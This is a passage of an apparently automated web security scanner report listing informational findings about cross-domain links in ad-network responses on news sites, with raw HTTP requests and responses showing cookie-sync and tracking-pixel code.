Set-Cookie: bh="b!!!#A!!-O3!!!!$<uFx5!!/xg!!!!#<uFx5!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!#<u]F[!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!%<uFx5!!j,.!!<NC<td)Q!!jW8!!!!#<u]F[!!vJ=!!!!#<uFx5!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!#<u]F[!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#.dO!!!!#<u]F[!#0')!!!!#<tdei!#1*j!!!!#<uFx5!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#Km-!!!!#<u7R!!#M]c!!!!#<u]F[!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!#<u]F[!#Q+^!!!!#<u]F[!#Q+o!!!!#<u]F[!#Q+p!!!!#<u]F[!#Q,.!!!!#<u]F[!#RY.!!!!#<u]F[!#SCj!!!!#<u]F[!#SCk!!!!#<u]F[!#XA!!!!!#<u]F[!#Z8E!!!!$<uFx5!#Z`$!!!!#<uFx5!#Zea!!!!#<uFx5!#]W%!!!!#<u]F[!#^Bo!!!!#<u]F[!#`U,!!!!#<uFx5!#`U/!!!!#<uFx5!#`U4!!!!#<uFx5!#`U9!!!!#<uFx5!#`_p!!!!#<tdei!#a,x!!!!#<u]F[!#a3k!!!!#<u]F[!#aG>!!!!#<u]F[!#aH+!!!!#<u]Bd!#c%+!!!!#<u7R!!#eRM!!!!#<tdei!#eU%!!!!#<u]F[!#eaO!!!!#<u]F[!#f8c!!!!#<u]F[!#fBj!!!!$<uFx5!#fBk!!!!$<uFx5!#fBm!!!!$<uFx5!#fBn!!!!$<uFx5!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#gHm!!!!#<u]F[!#g[h!!!!#<u]F[!#gb%!!!!#<uFx5!#gu2!!!!#<tePk!#l*=!!!!#<u]F[!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!#<u]F[!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!%<uFx5!#uR7!!!!$<uFx5!#uR:!!!!%<uFx5!#ust!!!!#<u]F[!#usu!!!!#<u]F[!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!#<u]F[!#wmL!!!!#<u]F[!#wnK!!!!#<u]F[!#wnM!!!!#<u]F[!#xI*!!!!#<u]F[!#xu[!!!!#<u]Bd!#yM#!!!!#<u]F[!$#WA!!!!#<u]F[!$#r<!!!!#<td)R!$%,!!!!!#<u]F[!$%SB!!!!#<u]F[!$'(]!!!!#<u]Bd"; path=/; expires=Mon, 08-Apr-2013 12:35:45 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 12:35:45 GMT
Pragma: no-cache
Content-Length: 1964
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=XFL7COWz7gEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=RmcwCOXM6QEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=ZaKlCLWN7AEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=0pAQCKDe0wEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=ooGmCK2U7wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=uk38CIiX0QEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=UlRaCL3p5gEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=Dtp9CMW-4AEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=6gplCPXJ6wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://ad.doubleclick.net/activity;src=1906576;dcnet=4591;boom=18926;sz=1x1;ord=" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
10.111. http://admeld-match.dotomi.com/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:23 GMT
X-Name: rtb-o08
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 132

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78&external_user_id=0&expiration=1302798083" alt="" />');
10.112. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=8663496762294337265; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 11 Apr 2011 16:21:19 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=8663496762294337265&expiration=0" width="0" height="0"/>');
10.113. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:19 GMT
Expires: Mon, 11 Apr 2011 16:31:19 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NmZC-t7Z; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:19 GMT; Path=/
Content-Length: 164
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3406242120278446565"/>');
10.114. http://ads.adsonar.com/adserving/getAds.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=423757&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:18 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 13677


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</p>
                                                               <img src="http://view.atdmt.com/CNT/view/305649791/direct;wi.1;hi.1/01/" width="1" height="1" border="0" alt="" />
                                                                                                               
                                                           </div>
...[SNIP]...
<td><iframe src="http://cdn.tacoda.at.atwola.com/an/qseg.html" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
10.115. http://ads.financialcontent.com/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.financialcontent.com
Path:   /www/delivery/afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /www/delivery/afr.php?n=fcad8083334&&zoneid=1311&cb=fcad8083334 HTTP/1.1
Host: ads.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://studio-5.financialcontent.com/worldnow?Module=adbox_below
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:09 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze1 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.3.3-7+squeeze1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=61818d45a2dc1071204bb322fbeddac4; expires=Sun, 08-Apr-2012 12:34:09 GMT; path=/
Set-Cookie: OAVARS[fcad8083334]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A3%3A%22509%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A4%3A%221311%22%3B%7D; path=/
Content-Length: 4781
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- Code fragment starts here -->
<link rel="stylesheet" href="http://www.guidetolenders.com/widget/style/shwidget.css" type="text/css" media="all">
<div id="qsmrWidgetContainer">
...[SNIP]...
<p>In the mean time, check out our <a target="_blank" href="http://www.hsh.com/mortgage-quotes/ratetable2.php?src=211950">refinance rates</a>
...[SNIP]...
<a title="Go" target="_blank"><img src="http://www.guidetolenders.com/widget/images/go.png" alt="Go" height="30" width="50"></a>
...[SNIP]...
<a title="Go" target="_blank"><img src="http://www.guidetolenders.com/widget/images/go.png" alt="Go" height="30" width="50"></a>
...[SNIP]...
<a title="Go" target="_blank"><img src="http://www.guidetolenders.com/widget/images/go.png" alt="Go" height="30" width="50"></a>
...[SNIP]...
</span>Powered by HSH.com <a href="http://www.guidetolenders.com/widget/shdisclaimer.html" target="_blank">disclaimer</a>
...[SNIP]...
10.116. http://ads.foxnews.com/js/ad.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.foxnews.com
Path:   /js/ad.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/ad.js?1302538751 HTTP/1.1
Host: ads.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 06 Apr 2011 18:16:40 GMT
ETag: "50591c-d3db-4a043fe819200"
Accept-Ranges: bytes
Vary: Accept-Encoding
X-FoxNews-EdgeTTL: 1d
Content-Type: text/javascript
Cache-Control: max-age=53851
Date: Mon, 11 Apr 2011 16:21:05 GMT
Connection: close
Content-Length: 54235

(function($) {
$.ad = {
       _tile: 0,
       ord: Math.floor(999999999*Math.random()),
       _meta: {},
       _data: {},
       dc: {
           _svr: "http://ad.doubleclick.net",
           _method: "adj",
           _url: "",
           _kw: "",
...[SNIP]...
</scr"+ "ipt>";//document.write(\"<iframe src='http://www.google.com'></iframe>
...[SNIP]...
10.117. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=361&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@2@4da052a4@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: vsd=0@3@4da052a5@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:49 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:49 GMT
Content-Length: 1765

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25460691&ahcid=626665&bimpd=oCYq32pIZ44WC2Hj5xaHoLPQdjNgnkrcewOjDo-n1SQYOy60a80tXQLMIYNrPi8F1664kf5wZPsaRNWwVIbAU-eJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-ttHpOdd8gjAewOJMnTQwgdl5QDpDUC-vOZsRPj-MkGa57gszPmsRJAqUr5mT0N-hEt_-OMriirEJtFCEL4pLuKUABz9e_2LD2rWgc-YRgo6IbckKC_LnaN69g0FMX7-TF95NYeOAj5tzKPHATDHK-Cq6UYAKnaMvABgP2u19TIKcpFcmj-iuG9Q60TKRrws-nLPCQNQ1NJ6FtytBorXofoEBJzAJqRQKNCMhmRJVL7kD5k5GE2nYAUMdX6yNdD3svuGdG5chMdF03I6lYieZZRJYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHAcwIO0t-v2_oA0KBTl2259oCaDQETNtbnJloB6dPHPasJ_FzMFXQEDgUfSCtUSLicZkyhJiHOcIpAkX2vs7y5mmpiAdOREtMr-N-23iPhXlhUkUCdIkCBVZI3d02yD5E9PTjY9feOgvB3zAi-yxJW2batfVIVycpJBqx_Q1xI6ft_T370WDWWY1SqEwEJwbh2X53MDgW7m98GlAg2q8y7zQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.01125653140914017'><\/script>
...[SNIP]...
10.118. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=3MpWR5A2dm4wb86Ost9BgfW2y4laOK6y3xkEgOIfGnUQJqT_Sonlitequ0d-rj9v4_0-7x_M3XPMN0aPyChPXeeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmVmmTsVmBcqqleqKTdrTbA03dnura1cEVep9swAHPGcQmDe1mufDYlXrR6QZvzdoJcPRmC1M1UJnq3ySHYLSnRICeaMjHg_OzdSuB4jPjPLKpf3Kh44h6DVsc7_xcKnSPja3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoB62bqhbUx_nuFRMzf2Fprd949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8kNDTINHQPQ6af6fnku4BhPQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027562246532832593'><\/script>
...[SNIP]...
10.119. http://adserver.veruta.com/cookiematch.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 146

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567&external_user_id=0&expiration=1305131479"/>');
10.120. http://adserver.veruta.com/cookiematch.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
